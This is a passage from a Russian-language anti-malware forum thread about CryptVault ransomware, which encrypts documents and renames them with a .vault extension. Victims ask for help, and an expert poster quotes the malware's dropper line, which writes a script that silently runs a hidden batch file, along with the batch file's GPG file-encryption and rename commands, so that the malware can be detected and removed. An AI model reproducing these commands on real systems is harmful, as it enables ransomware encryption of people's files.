файлы зашифрованы с расширением .vault , bat encoder /CryptVault

RSS

Сообщений: 11

Баллов: 5

Регистрация: 19.02.2015

Размещено 19.02.2015 20:27:57

Зашифровались файлы с расшрирением doc. и так далее. Cтали с расширением, например doc.vault. При загрузке компа выскакивает окно с ссылкой на сайт злоумышленников. Плз. помогите.

Прикрепленные файлы

DMITRY-MSI_2015-02-19_20-15-14.TXT

Ответы

Пред. 1 ... 45 46 47 48 49

Сообщений: 3

Баллов: 1

Регистрация: 28.10.2015

Размещено 28.10.2015 15:16:40

Это меня и удивило - антивирус его в принципе распознает, но не распознал в момент запуска/создания/работы, да и шифрование процесс не такой быстрый.

Сообщений: 17977

Баллов: 28762

Регистрация: 16.03.2010

Размещено 28.10.2015 15:17:02

вот этот скриптик надо удалять

Цитата
echo var cdp="%%TEMP%%\\a01dc229.cmd";var WshShell=CreateObject("WScript.Shell");cdp=WshShell.ExpandEnvironmentStrings(cdp);function CreateObject(fq){return new ActiveXObject(fq)}function xx(cdp){WshShell.Run(cdp,0,0);}>> "%temp%\7c62070c.js"

тот что выше, похоже, используют как обманку для антивируса. два однотипных скрипта, но только один из них запускает процесс шифрования.
а на него как раз - ноль реакции, хотя именно он содержит ссылку на командный файл a01dc229.cmd, в котором собраны все команды шифрования файлов. после обхода дисков и очистки от лишних строк.

вот с этим содержимым и надо ловить файл, здесь инфы предостаточно, чтобы отловить его.

Цитата
chcp 866 "%TeMp%\d4a76286.exe" -r Cellar --yes -q --no-verbose --trust-model always --encrypt-files "C:\файлы для тестирования шифровальщиков\15092014 16_55_03.xls"& move /y "C:\файлы для тестирования шифровальщиков\15092014 16_55_03.xls.gpg" "C:\файлы для тестирования шифровальщиков\15092014 16_55_03.xls"& rename "C:\файлы для тестирования шифровальщиков\15092014 16_55_03.xls" "15092014 16_55_03.xls.vault" "%TeMp%\d4a76286.exe" -r Cellar --yes -q --no-verbose --trust-model always --encrypt-files "C:\файлы для тестирования шифровальщиков\32 ремонтный завод .xls"& move /y "C:\файлы для тестирования шифровальщиков\32 ремонтный завод .xls.gpg" "C:\файлы для тестирования шифровальщиков\32 ремонтный завод .xls"& rename "C:\файлы для тестирования шифровальщиков\32 ремонтный завод .xls" "32 ремонтный завод .xls.vault"

Цитата

chcp 866
"%TeMp%\d4a76286.exe" -r Cellar --yes -q --no-verbose --trust-model always --encrypt-files "C:\файлы для тестирования шифровальщиков\15092014 16_55_03.xls"& move /y "C:\файлы для тестирования шифровальщиков\15092014 16_55_03.xls.gpg" "C:\файлы для тестирования шифровальщиков\15092014 16_55_03.xls"& rename "C:\файлы для тестирования шифровальщиков\15092014 16_55_03.xls" "15092014 16_55_03.xls.vault"
"%TeMp%\d4a76286.exe" -r Cellar --yes -q --no-verbose --trust-model always --encrypt-files "C:\файлы для тестирования шифровальщиков\32 ремонтный завод .xls"& move /y "C:\файлы для тестирования шифровальщиков\32 ремонтный завод .xls.gpg" "C:\файлы для тестирования шифровальщиков\32 ремонтный завод .xls"& rename "C:\файлы для тестирования шифровальщиков\32 ремонтный завод .xls" "32 ремонтный завод .xls.vault"

Изменено: santy - 04.06.2016 18:08:54

[ Как создать образ автозапуска? ]

Сообщений: 1

Регистрация: 19.11.2015

Размещено 19.11.2015 18:06:48

На мой компьютер проник вирус (баннер) и испортил все текстовые документы, переведя их в формат Vault

Прикрепленные файлы

1.jpg (97.58 КБ)

2.jpg (129.39 КБ)

Изменено: Ильдар Арасланов - 16.03.2017 06:17:04

Сообщений: 17977

Баллов: 28762

Регистрация: 16.03.2010

Размещено 19.11.2015 19:41:10

Ильдар, когда было шифрование по дате?

[ Как создать образ автозапуска? ]

Пред. 1 ... 45 46 47 48 49